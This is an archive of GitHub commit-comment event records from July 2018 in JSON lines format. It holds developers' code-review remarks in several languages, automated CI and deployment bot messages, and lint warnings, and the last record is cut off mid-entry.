{"id":"7924516234","type":"CommitCommentEvent","actor":{"login":"abrizida"},"repo":{"name":"OpenAF/nAttrMon"},"payload":{"comment":{"id":29609916,"position":null,"line":null,"path":null,"commit_id":"6a02f9cf7458432e18685ef7871810231f7a9fb3","created_at":"2018-07-05T17:14:36Z","updated_at":"2018-07-05T17:14:36Z","author_association":"COLLABORATOR","body":"Looks Good. :)"}},"created_at":"2018-07-05T17:14:36Z"}
{"id":"7924516896","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29609917,"position":58,"line":58,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T17:14:46Z","updated_at":"2018-07-05T17:14:46Z","author_association":"MEMBER","body":"itemtype has an issue right now where it will let itemtypes in, but the reverse (itemtype -> itemstack) will convert correctly, so i used that until the cause of that is fixed"}},"created_at":"2018-07-05T17:14:46Z"}
{"id":"7924516941","type":"CommitCommentEvent","actor":{"login":"mrocklin"},"repo":{"name":"dask/dask-examples"},"payload":{"comment":{"id":29609918,"position":170,"line":419,"path":"machine-learning/incremental.ipynb","commit_id":"2341a2eff2224e2f7b6dd4cd8db439a3a755077f","created_at":"2018-07-05T17:14:46Z","updated_at":"2018-07-05T17:14:46Z","author_association":"MEMBER","body":"Why this change?"}},"created_at":"2018-07-05T17:14:46Z"}
{"id":"7924518232","type":"CommitCommentEvent","actor":{"login":"meijeru"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29609923,"position":null,"line":null,"path":null,"commit_id":"963ec55a6bab860f8b259246f794bde6ea0172be","created_at":"2018-07-05T17:15:05Z","updated_at":"2018-07-05T17:15:05Z","author_association":"NONE","body":"The only way I see is to write a small Red program that extracts the usage part from the readme file. Anyhow, how is %usage.txt used? How does the user call it up?"}},"created_at":"2018-07-05T17:15:05Z"}
{"id":"7924524954","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29609942,"position":null,"line":null,"path":null,"commit_id":"733209d1d005630a3ea9f592bedfdad7e7f05121","created_at":"2018-07-05T17:16:33Z","updated_at":"2018-07-05T17:16:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-126](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-126).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-126-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T17:16:33Z"}
{"id":"7924525956","type":"CommitCommentEvent","actor":{"login":"guydvir2"},"repo":{"name":"guydvir2/LocalSwitch"},"payload":{"comment":{"id":29609945,"position":null,"line":null,"path":null,"commit_id":"53810c8738446e64dcb556f5d5b3cc9475616dda","created_at":"2018-07-05T17:16:47Z","updated_at":"2018-07-05T17:16:47Z","author_association":"OWNER","body":"This is bad solution!\r\n"}},"created_at":"2018-07-05T17:16:47Z"}
{"id":"7924525997","type":"CommitCommentEvent","actor":{"login":"PerrineFo"},"repo":{"name":"PerrineFo/Data-scientist"},"payload":{"comment":{"id":29609946,"position":null,"line":null,"path":null,"commit_id":"ac841b895972d833a17f4d5b3d33f9809fdee477","created_at":"2018-07-05T17:16:47Z","updated_at":"2018-07-05T17:16:47Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-05T17:16:47Z"}
{"id":"7924527078","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29609952,"position":1,"line":null,"path":"1530811020.8/github_test.txt","commit_id":"e7a27b859d9f7638f73b60b16ab8c4675e8482d0","created_at":"2018-07-05T17:17:02Z","updated_at":"2018-07-05T17:17:02Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-05T17:17:02Z"}
{"id":"7924527824","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29609955,"position":70,"line":70,"path":"my_game.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:17:13Z","updated_at":"2018-07-05T17:17:13Z","author_association":"NONE","body":"методы, которые возвращают булево значение в руби принято присать со знаком вопроса на конце\r\nи название для них подбирают соответстующее\r\nподумай, как здесь изменить, чтобы проверка в 62 строке читалась как фраза из английского текста\r\n"}},"created_at":"2018-07-05T17:17:13Z"}
{"id":"7924529182","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29609959,"position":null,"line":null,"path":null,"commit_id":"5bc960a109750a62fd3614f919c63ea58083944b","created_at":"2018-07-05T17:17:33Z","updated_at":"2018-07-05T17:17:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-104](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-104).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-104-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-05T17:17:33Z"}
{"id":"7924529462","type":"CommitCommentEvent","actor":{"login":"ubcent"},"repo":{"name":"ryzhkovstanislav/njs_tasks"},"payload":{"comment":{"id":29609961,"position":79,"line":79,"path":"homework6/server.js","commit_id":"a4cf1db6d69823e0539235b3771ca5d61d8518df","created_at":"2018-07-05T17:17:36Z","updated_at":"2018-07-05T17:17:36Z","author_association":"NONE","body":"```javascript\r\nconst { username, password, password2 } = req.body;\r\n```"}},"created_at":"2018-07-05T17:17:36Z"}
{"id":"7924534424","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29609974,"position":null,"line":null,"path":null,"commit_id":"d280683627249af96a889b3f22c5e416c460aa20","created_at":"2018-07-05T17:18:44Z","updated_at":"2018-07-05T17:18:44Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/70/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/70//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/d280683627249af96a889b3f22c5e416c460aa20/70/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/d280683627249af96a889b3f22c5e416c460aa20/70/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/d280683627249af96a889b3f22c5e416c460aa20/70/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/d280683627249af96a889b3f22c5e416c460aa20/70/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T17:18:44Z"}
{"id":"7924535129","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29609975,"position":null,"line":null,"path":null,"commit_id":"080a959ff9b6760caf4142d556c664ccc13638d3","created_at":"2018-07-05T17:18:54Z","updated_at":"2018-07-05T17:18:54Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T17:18:54Z"}
{"id":"7924538858","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29609980,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T17:19:41Z","updated_at":"2018-07-05T17:19:41Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2969 of 2969 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T17:19:41Z"}
{"id":"7924540443","type":"CommitCommentEvent","actor":{"login":"0zoo"},"repo":{"name":"0zoo/TIL"},"payload":{"comment":{"id":29609985,"position":null,"line":null,"path":null,"commit_id":"adcd5a2de585d5e353f725ec286cb64862d22071","created_at":"2018-07-05T17:20:03Z","updated_at":"2018-07-05T17:20:03Z","author_association":"OWNER","body":"0.0 ![](![](![](ddd)))\n\n![Image](https://i.imgur.com/ZOTXT6C.jpg)"}},"created_at":"2018-07-05T17:20:03Z"}
{"id":"7924540591","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29609986,"position":5,"line":229,"path":"src/main/java/ch/njol/skript/lang/Variable.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T17:20:06Z","updated_at":"2018-07-05T17:20:06Z","author_association":"MEMBER","body":"it's already exposed to everyone via Variables#getVariable, this just gets rid of the redundancy of calling it. "}},"created_at":"2018-07-05T17:20:06Z"}
{"id":"7924541219","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29609987,"position":null,"line":null,"path":null,"commit_id":"436d668425848c7c8087fe7b3e622fa673e599ea","created_at":"2018-07-05T17:20:14Z","updated_at":"2018-07-05T17:20:14Z","author_association":"OWNER","body":"Apparently the stock 1.4 mesh switching rebuilds the rocket if a node moves between variants. @blowfishpro says it should be possible to have the functionality in B9PS so that will probably be gucci by the time I can actually finish these..."}},"created_at":"2018-07-05T17:20:14Z"}
{"id":"7924550159","type":"CommitCommentEvent","actor":{"login":"link108"},"repo":{"name":"link108/test-108"},"payload":{"comment":{"id":29610012,"position":null,"line":null,"path":null,"commit_id":"0a6afd91f710f3f9e18145205d25378ac721441d","created_at":"2018-07-05T17:22:12Z","updated_at":"2018-07-05T17:22:12Z","author_association":"OWNER","body":"lol thanks, have been thinking I should start using byah.org again at some point... "}},"created_at":"2018-07-05T17:22:12Z"}
{"id":"7924551099","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29610014,"position":null,"line":null,"path":null,"commit_id":"50fe451f915a022902794e81fb614db9a1685757","created_at":"2018-07-05T17:22:22Z","updated_at":"2018-07-05T17:22:22Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2306 of 2306 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50fe451f915a022902794e81fb614db9a1685757-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50fe451f915a022902794e81fb614db9a1685757-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T17:22:22Z"}
{"id":"7924552527","type":"CommitCommentEvent","actor":{"login":"mhinz"},"repo":{"name":"ipatch/dotfiles"},"payload":{"comment":{"id":29610018,"position":null,"line":null,"path":null,"commit_id":"93f6250d4a2cd15aeaae55fc793d4fa12565b396","created_at":"2018-07-05T17:22:39Z","updated_at":"2018-07-05T17:22:39Z","author_association":"NONE","body":"![](https://image.slidesharecdn.com/vim-rocks-140922140927-phpapp02/95/vim-rocks-13-638.jpg)"}},"created_at":"2018-07-05T17:22:39Z"}
{"id":"7924559529","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29610035,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T17:24:11Z","updated_at":"2018-07-05T17:24:11Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T17:24:11Z"}
{"id":"7924560015","type":"CommitCommentEvent","actor":{"login":"gurumurthys"},"repo":{"name":"awslabs/amazon-sagemaker-examples"},"payload":{"comment":{"id":29610038,"position":null,"line":null,"path":null,"commit_id":"6283c4090132101bd33c3bfebde2af8d124ac280","created_at":"2018-07-05T17:24:17Z","updated_at":"2018-07-05T17:24:17Z","author_association":"CONTRIBUTOR","body":"Comma is missing at the end and hence jupyter notebook is not loading. "}},"created_at":"2018-07-05T17:24:17Z"}
{"id":"7924581092","type":"CommitCommentEvent","actor":{"login":"TomyLobo"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":29610088,"position":5,"line":97,"path":"lua/entities/gmod_wire_expression2/core/init.lua","commit_id":"3d6ff50a37d9c91c542cf58895623a5394561289","created_at":"2018-07-05T17:28:49Z","updated_at":"2018-07-05T17:28:49Z","author_association":"CONTRIBUTOR","body":"Since this is run only once, why not a pattern?\r\n\r\n    return id:match(\"^(x.)?.$\")"}},"created_at":"2018-07-05T17:28:49Z"}
{"id":"7924581164","type":"CommitCommentEvent","actor":{"login":"Markngn"},"repo":{"name":"SudoKudo/Task-Manager"},"payload":{"comment":{"id":29610090,"position":null,"line":null,"path":null,"commit_id":"85c8c83a93cffa46a6fdeea1cb704408116f2a33","created_at":"2018-07-05T17:28:50Z","updated_at":"2018-07-05T17:28:50Z","author_association":"COLLABORATOR","body":"email functionality will be added"}},"created_at":"2018-07-05T17:28:50Z"}
{"id":"7924581696","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/myFirstApp"},"payload":{"comment":{"id":29610094,"position":null,"line":null,"path":null,"commit_id":"6b450e9d03a7002e112dd173c58ffc601ba06bf5","created_at":"2018-07-05T17:28:57Z","updated_at":"2018-07-05T17:28:57Z","author_association":"OWNER","body":"本来想添加父子组件交互的@Input装饰器进行父子组件通讯的，但是暂时还没调试成功，后续会继续更新"}},"created_at":"2018-07-05T17:28:57Z"}
{"id":"7924582863","type":"CommitCommentEvent","actor":{"login":"lmichael107"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29610098,"position":null,"line":null,"path":null,"commit_id":"276016bf25b6019ab19d22b93d5491eb244e4b62","created_at":"2018-07-05T17:29:13Z","updated_at":"2018-07-05T17:29:13Z","author_association":"COLLABORATOR","body":"I'm trying many variations based upon the format in your commit message, and they're not working? Can we see an example somewhere?"}},"created_at":"2018-07-05T17:29:13Z"}
{"id":"7924583907","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610099,"position":71,"line":71,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:29:26Z","updated_at":"2018-07-05T17:29:26Z","author_association":"NONE","body":"Consider reporting the numbers of each file type. Currently there is no need to maintain them as separate lists."}},"created_at":"2018-07-05T17:29:26Z"}
{"id":"7924584256","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29610100,"position":null,"line":null,"path":null,"commit_id":"dce11893301054d788da9c98ac46ccac85c40524","created_at":"2018-07-05T17:29:30Z","updated_at":"2018-07-05T17:29:30Z","author_association":"COLLABORATOR","body":"<h3>Updated readme</h3>\n\nPreview: <strong><a href='https://17853-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17853-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17853-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-05T17:29:30Z"}
{"id":"7924589585","type":"CommitCommentEvent","actor":{"login":"slavazhukov2"},"repo":{"name":"AlexeyLyt/homework05072018"},"payload":{"comment":{"id":29610120,"position":5,"line":63,"path":"main.js","commit_id":"28c335f7ed094fa03bf2580af0a8c3fc04c1ba0e","created_at":"2018-07-05T17:30:34Z","updated_at":"2018-07-05T17:30:34Z","author_association":"COLLABORATOR","body":"Так делать плохо, вы прям большой кусок HTML отправляете в js) Создавайте элементы и через appendChild вставляйте"}},"created_at":"2018-07-05T17:30:34Z"}
{"id":"7924593270","type":"CommitCommentEvent","actor":{"login":"basisbit"},"repo":{"name":"fscs/USDX"},"payload":{"comment":{"id":29610127,"position":null,"line":null,"path":null,"commit_id":"ae44d471007e28a934acdec27d580a14d5ce72e8","created_at":"2018-07-05T17:31:21Z","updated_at":"2018-07-05T17:31:21Z","author_association":"NONE","body":"feel free to do pull requests and possibly also join the USDX team, if you like the game :)\r\nAny reason against contributing at the main repo? Maybe we can meet in Düsseldorf and talk about it next week or so?"}},"created_at":"2018-07-05T17:31:21Z"}
{"id":"7924593854","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29610131,"position":79,"line":79,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T17:31:29Z","updated_at":"2018-07-05T17:31:29Z","author_association":"NONE","body":"Better ways to do this, in this implementation should be breaking the inner for loop here, it keeps going after a match is found currently"}},"created_at":"2018-07-05T17:31:29Z"}
{"id":"7924594262","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29610133,"position":null,"line":null,"path":null,"commit_id":"276016bf25b6019ab19d22b93d5491eb244e4b62","created_at":"2018-07-05T17:31:34Z","updated_at":"2018-07-05T17:31:34Z","author_association":"MEMBER","body":"Are you splitting it up between lines?\r\n\r\nWon't work:\r\n\r\n```\r\n%RED% content\r\nmore content%ENDCOLOR%\r\n```\r\nWorks:\r\n\r\n```\r\n%RED% content %ENDCOLOR%\r\n%RED% more content %ENDCOLOR%\r\n```\r\n"}},"created_at":"2018-07-05T17:31:34Z"}
{"id":"7924595581","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29610139,"position":null,"line":null,"path":null,"commit_id":"d4666d1e51a11f92614c18da806533175ee6a377","created_at":"2018-07-05T17:31:52Z","updated_at":"2018-07-05T17:31:52Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2927 of 2929 tests passed, 11 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4666d1e51a11f92614c18da806533175ee6a377-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T17:31:52Z"}
{"id":"7924604901","type":"CommitCommentEvent","actor":{"login":"williamsiuhang"},"repo":{"name":"3merge/crg"},"payload":{"comment":{"id":29610161,"position":null,"line":null,"path":null,"commit_id":"4cd582fbf14b8b5329631040c7e0d8fcfd46798e","created_at":"2018-07-05T17:33:46Z","updated_at":"2018-07-05T17:33:46Z","author_association":"CONTRIBUTOR","body":"Will need to add divider lines on page"}},"created_at":"2018-07-05T17:33:46Z"}
{"id":"7924605624","type":"CommitCommentEvent","actor":{"login":"furby420"},"repo":{"name":"EOTCoinOrg/EOTCoin"},"payload":{"comment":{"id":29610166,"position":null,"line":null,"path":null,"commit_id":"f216b4041abd100e88fe917c1f96221b1515aa13","created_at":"2018-07-05T17:33:56Z","updated_at":"2018-07-05T17:33:56Z","author_association":"NONE","body":"EaUFfYwJfZTydsaKxq259KSenoW1Akeroh"}},"created_at":"2018-07-05T17:33:56Z"}
{"id":"7924605926","type":"CommitCommentEvent","actor":{"login":"ubcent"},"repo":{"name":"ryzhkovstanislav/njs_tasks"},"payload":{"comment":{"id":29610167,"position":82,"line":82,"path":"homework6/server.js","commit_id":"a4cf1db6d69823e0539235b3771ca5d61d8518df","created_at":"2018-07-05T17:34:00Z","updated_at":"2018-07-05T17:34:00Z","author_association":"NONE","body":"```javascript\r\nlet user = await User.findOne({email: username.toLowerCase()});\r\n```"}},"created_at":"2018-07-05T17:34:00Z"}
{"id":"7924607139","type":"CommitCommentEvent","actor":{"login":"ubcent"},"repo":{"name":"ryzhkovstanislav/njs_tasks"},"payload":{"comment":{"id":29610169,"position":95,"line":95,"path":"homework6/server.js","commit_id":"a4cf1db6d69823e0539235b3771ca5d61d8518df","created_at":"2018-07-05T17:34:16Z","updated_at":"2018-07-05T17:34:16Z","author_association":"NONE","body":"email: username.toLowerCase()"}},"created_at":"2018-07-05T17:34:16Z"}
{"id":"7924608362","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29610173,"position":6,"line":6,"path":"player.rb","commit_id":"49c0eb6682d3ca620e1125b0085e25727d1c27a2","created_at":"2018-07-05T17:34:31Z","updated_at":"2018-07-05T17:34:31Z","author_association":"NONE","body":"не обратил внимания в прошлый раз\r\nэто не очень хорошая практика давать прямой доступ к инстанс-переменным снаружи класса\r\nправильней использовать для этого специальные методы\r\nк примеру. вспомни как было реализовано изменение скорости у поезда... никаого прямого доступа, но есть методы для увеличения и есть для уменьшения (мне кажется был всего один акссессор на весь проект, да и тот для \"неважного\" аттрибута - имени производителя)"}},"created_at":"2018-07-05T17:34:31Z"}
{"id":"7924610561","type":"CommitCommentEvent","actor":{"login":"bolianchen"},"repo":{"name":"bolianchen/hello-world"},"payload":{"comment":{"id":29610180,"position":null,"line":null,"path":null,"commit_id":"d851c7f33a3ffbb5f6590065d08266470361d8b2","created_at":"2018-07-05T17:35:02Z","updated_at":"2018-07-05T17:35:02Z","author_association":"OWNER","body":"only a file being added, it's fine"}},"created_at":"2018-07-05T17:35:02Z"}
{"id":"7924610729","type":"CommitCommentEvent","actor":{"login":"ritiek"},"repo":{"name":"idies/pyJHTDB"},"payload":{"comment":{"id":29610182,"position":7,"line":175,"path":"pyJHTDB/dbinfo.py","commit_id":"9e71d953e3e3eff557f25ae1fc6b1b4b1ec6bf3a","created_at":"2018-07-05T17:35:05Z","updated_at":"2018-07-05T17:35:05Z","author_association":"NONE","body":"That was quick! Thanks a lot!"}},"created_at":"2018-07-05T17:35:05Z"}
{"id":"7924614248","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29610196,"position":null,"line":null,"path":null,"commit_id":"f8a4f00a9a39f611518d526dac65fa972b2817a4","created_at":"2018-07-05T17:35:50Z","updated_at":"2018-07-05T17:35:50Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T17:35:50Z"}
{"id":"7924616771","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29610203,"position":100,"line":100,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T17:36:23Z","updated_at":"2018-07-05T17:36:23Z","author_association":"MEMBER","body":"cant do anything about it unfortunately, spigot has yet to add a replacement without magic values (IDs/data values)"}},"created_at":"2018-07-05T17:36:23Z"}
{"id":"7924619686","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29610212,"position":null,"line":null,"path":null,"commit_id":"85bc85a607d2763165d0886b8d37ff37474974c0","created_at":"2018-07-05T17:37:01Z","updated_at":"2018-07-05T17:37:01Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-17](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-05T17:37:01Z"}
{"id":"7924623746","type":"CommitCommentEvent","actor":{"login":"drianoaz"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29610223,"position":4,"line":3,"path":"src/js/controllers/TodoController.js","commit_id":"07d5699eaf221e774654d43f37c02a6824938576","created_at":"2018-07-05T17:37:56Z","updated_at":"2018-07-05T17:37:56Z","author_association":"OWNER","body":"Mas é uma melhoria interessante, vou fazer ela. "}},"created_at":"2018-07-05T17:37:56Z"}
{"id":"7924624118","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29610225,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-05T17:38:01Z","updated_at":"2018-07-05T17:38:01Z","author_association":"OWNER","body":"@reffort I don't get exactly what you do prefer. We could use the extension level by use of the `.xflag` request to enable the advanced features or we could copy the source directory `troff` to a new directory _new_`troff` and then have three executables to be installed: `nroff`, `troff`, and _new_`troff`. So users can render their existing documents with `troff` while creating new advanced documents using _new_`troff`. The drawback would be that some bug fixes would need to be applied to the `troff` and the _new_`troff` directory."}},"created_at":"2018-07-05T17:38:01Z"}
{"id":"7924627178","type":"CommitCommentEvent","actor":{"login":"nickelser"},"repo":{"name":"ankane/jetpack"},"payload":{"comment":{"id":29610229,"position":null,"line":null,"path":null,"commit_id":"dffe581a40b2f52b186410109d7b959d46bce764","created_at":"2018-07-05T17:38:43Z","updated_at":"2018-07-05T17:38:43Z","author_association":"NONE","body":"was _weigh_ too heavy before"}},"created_at":"2018-07-05T17:38:43Z"}
{"id":"7924628377","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29610232,"position":null,"line":null,"path":null,"commit_id":"583348edf57c08e7bebe0b48a131e93f93aad685","created_at":"2018-07-05T17:38:58Z","updated_at":"2018-07-05T17:38:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T17:38:58Z"}
{"id":"7924629921","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29610233,"position":null,"line":null,"path":null,"commit_id":"be771d9c34e5eda53aee0abf9c59938a81b578e8","created_at":"2018-07-05T17:39:19Z","updated_at":"2018-07-05T17:39:19Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n 